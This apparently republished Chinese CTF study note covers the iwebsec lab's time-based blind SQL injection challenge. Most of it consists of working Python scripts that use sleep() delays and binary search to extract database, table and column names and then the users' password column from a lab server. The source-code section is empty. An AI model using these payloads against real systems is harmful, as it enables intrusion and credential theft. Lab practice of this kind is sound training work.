CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入
2022/1/23 2:04:16
本文主要是介绍CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
目录
- 一、解题过程
- (一)观察页面
- (二)编写脚本逐项获取数据
- 1.获取数据库名的长度(可不做)
- 2.获取数据库名(可不做)
- 3.获取表名
- 4.获取users表的列名
- 5.获取password列的数据
- 二、源码分析
- (一)php源码
- 关键脚本
一、解题过程
(一)观察页面
发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入
(二)编写脚本逐项获取数据
1.获取数据库名的长度(可不做)
#encoding=utf-8 import requests import os import time url="http://192.168.182.130:8001/sqli/04.php" def DbLen(): for i in range(1,10): payload="?id=if(length(database())={},sleep(1),1)--+".format(i) req_url=url+payload start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: print("DB length is "+str(i)) DbLen()
2.获取数据库名(可不做)
def DbName(): result="" for i in range(1,8): l = 32 r = 130 mid = (l + r) >> 1 while (l < r): payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid) req_url=url+payload #print(req_url) start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: l = mid +1 else: r = mid mid = (l + r)>>1 result=result+chr(mid) print("the result is {}".format(result)) DbName()
3.获取表名
def TablesName(): result="" for i in range(1,50): l = 32 r = 130 mid = (l + r) >> 1 while (l < r): payload='''?id=if(ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid) req_url=url+payload #print(req_url) start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: l = mid +1 else: r = mid mid = (l + r)>>1 result=result+chr(mid) print("the result is {}".format(result)) TablesName()
4.获取users表的列名
def ColumnsName(): result="" for i in range(1,30): l = 32 r = 130 mid = (l + r) >> 1 while (l < r): payload='''?id=if(ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i,mid) req_url=url+payload #print(req_url) start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: l = mid +1 else: r = mid mid = (l + r)>>1 result=result+chr(mid) print("the result is {}".format(result)) ColumnsName()
5.获取password列的数据
def GetData(): result="" for i in range(1,50): l = 32 r = 130 mid = (l + r) >> 1 while (l < r): payload="?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i,mid) req_url=url+payload #print(req_url) start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: l = mid +1 else: r = mid mid = (l + r)>>1 result=result+chr(mid) print("the result is {}".format(result)) GetData()
二、源码分析
(一)php源码
关键脚本
这篇关于CTF学习笔记6:iwebsec-SQL注入漏洞-03-sleep注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-10-04el-table 开启定时器下,表格的选中状态会消失是什么原因-icode9专业技术文章分享
- 2024-10-03如何安装和初始化飞牛私有云 fnOS?-icode9专业技术文章分享
- 2024-10-03如何安装 App 并连接到飞牛 NAS?-icode9专业技术文章分享
- 2024-10-03如何安装飞牛 TV 并连接到影视服务器?-icode9专业技术文章分享
- 2024-10-03如何在PVE和ESXI上安装飞牛私有云 fnOS?-icode9专业技术文章分享
- 2024-10-03fnOS国产最强NAS安装系统异常情况处理-icode9专业技术文章分享
- 2024-10-03飞牛NAS如何创建存储空间?-icode9专业技术文章分享
- 2024-10-03fnOS国产最强NAS硬盘会自动休眠吗?-icode9专业技术文章分享
- 2024-10-03fnOS国产最强NAS如何安装飞牛影视和创建媒体库?-icode9专业技术文章分享
- 2024-10-03fnOS国产最强NAS如何为家人朋友开通影视账号?-icode9专业技术文章分享